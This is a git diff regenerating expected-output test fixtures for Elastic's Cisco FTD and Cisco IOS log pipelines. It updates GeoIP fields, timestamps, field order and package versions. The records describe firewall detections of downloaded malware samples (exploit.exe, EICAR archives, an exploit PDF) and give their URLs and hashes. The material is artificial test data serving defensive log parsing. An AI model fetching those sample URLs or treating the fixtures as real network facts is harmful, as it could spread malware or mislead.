@@ -22,25 +22,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:54:25.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { "version": "1.12.0" }, @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450128Z", + "ingested": "2021-12-14T14:40:18.397013048Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -124,25 +124,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:55:02.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { "version": "1.12.0" }, 
@@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450136100Z", + "ingested": "2021-12-14T14:40:18.397015674Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -226,25 +226,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:00:29.000Z", "file": { "name": "eicar.com" }, + "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { "version": "1.12.0" }, @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450162100Z", + "ingested": "2021-12-14T14:40:18.397016144Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", 
@@ -328,25 +328,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:01:41.000Z", "file": { "name": "eicar.com.txt" }, + "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { "version": "1.12.0" }, @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450167300Z", + "ingested": "2021-12-14T14:40:18.397016542Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -430,22 +430,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:28.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -453,6 +452,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { "version": "1.12.0" }, 
@@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450172700Z", + "ingested": "2021-12-14T14:40:18.397016921Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -543,22 +543,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:33.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -566,6 +565,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { "version": "1.12.0" }, 
@@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450177500Z", + "ingested": "2021-12-14T14:40:18.397017337Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -656,22 +656,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:09:43.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -679,6 +678,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { "version": "1.12.0" }, 
@@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450181500Z", + "ingested": "2021-12-14T14:40:18.397017744Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,20 +758,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -790,22 +784,21 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:39:03.000Z", "file": { "size": 184, "name": "eicar_com.zip", 
@@ -813,6 +806,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { "version": "1.12.0" }, @@ -836,7 +830,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450201900Z", + "ingested": "2021-12-14T14:40:18.397018130Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -904,22 +898,21 @@ "scheme": "http", "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:40:45.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -927,6 +920,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { "version": "1.12.0" }, 
@@ -950,7 +944,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450207500Z", + "ingested": "2021-12-14T14:40:18.397018535Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,20 +999,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -1036,22 +1024,21 @@ "scheme": "http", "domain": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:42:07.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", 
@@ -1059,6 +1046,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { "version": "1.12.0" }, @@ -1082,7 +1070,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450211600Z", + "ingested": "2021-12-14T14:40:18.397018927Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index ba055f04e31..21678d0ca96 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json 
@@ -10,52 +10,40 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 65090, "bytes": 729, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "url": { "path": "/favicon.ico", @@ -67,15 +55,15 @@ "eyedropper-color-pick.info" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "chrome", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -118,7 +106,7 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-09T13:35:23.717443400Z", + "ingested": "2021-12-14T14:40:20.860831313Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index 5401420f54b..31a83dcd98f 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ftd title: Cisco FTD -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs from Cisco FTD with Elastic Agent. type: integration diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index 11ff65eda30..dc5a9f19fa8 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 83f9ae2f713..ec62e75bacc 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,6 +1,15 @@ { "expected": [ { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.197", + "224.0.0.22" + ] + }, "log": { "level": "informational", "source": { @@ -17,28 +26,10 @@ "ip": "192.168.100.197" }, "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", - "transport": "igmp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.197", - "224.0.0.22" - ] - }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-12-09T13:35:26.832459800Z", + "ingested": "2021-12-14T14:40:24.398623068Z", "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", @@ -51,6 +42,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", + "transport": "igmp", + "type": "ipv4", + "packets": 1 } }, { 
@@ -94,7 +94,7 @@ "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-12-09T13:35:26.832466400Z", + "ingested": "2021-12-14T14:40:24.398625713Z", "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", @@ -110,6 +110,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.1", + "255.255.255.255" + ] + }, "log": { "level": "informational", "source": { @@ -126,27 +135,10 @@ "ip": "192.168.100.1" }, "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "iana_number": "0", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.1", - "255.255.255.255" - ] - }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-12-09T13:35:26.832471900Z", + "ingested": "2021-12-14T14:40:24.398626168Z", "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", @@ -159,9 +151,25 @@ "facility": "SEC", "access_list": "171" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "iana_number": "0", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "log": { "level": "informational", "source": { 
@@ -171,18 +179,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, @@ -191,18 +193,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, @@ -210,27 +206,10 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", - "transport": "tcp", - "type": "ipv6", - "packets": 9 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] - }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-12-09T13:35:26.832477600Z", + "ingested": "2021-12-14T14:40:24.398626589Z", "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", 
@@ -243,9 +222,27 @@ "facility": "IPV6", "access_list": "ACL-IPv6-E0/0-IN/10" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", + "transport": "tcp", + "type": "ipv6", + "packets": 9 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -264,28 +261,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-12-09T13:35:26.832482100Z", + "ingested": "2021-12-14T14:40:24.398627015Z", "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -298,6 +277,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -342,7 +330,7 @@ "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-12-09T13:35:26.832487Z", + "ingested": "2021-12-14T14:40:24.398627402Z", "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", 
@@ -358,6 +346,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -376,28 +373,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663312, - "ingested": "2021-12-09T13:35:26.832491400Z", + "ingested": "2021-12-14T14:40:24.398627791Z", "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -410,6 +389,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -425,7 +413,7 @@ "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-12-09T13:35:26.832496700Z", + "ingested": "2021-12-14T14:40:24.398628192Z", "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -443,6 +431,15 @@ ] }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { 
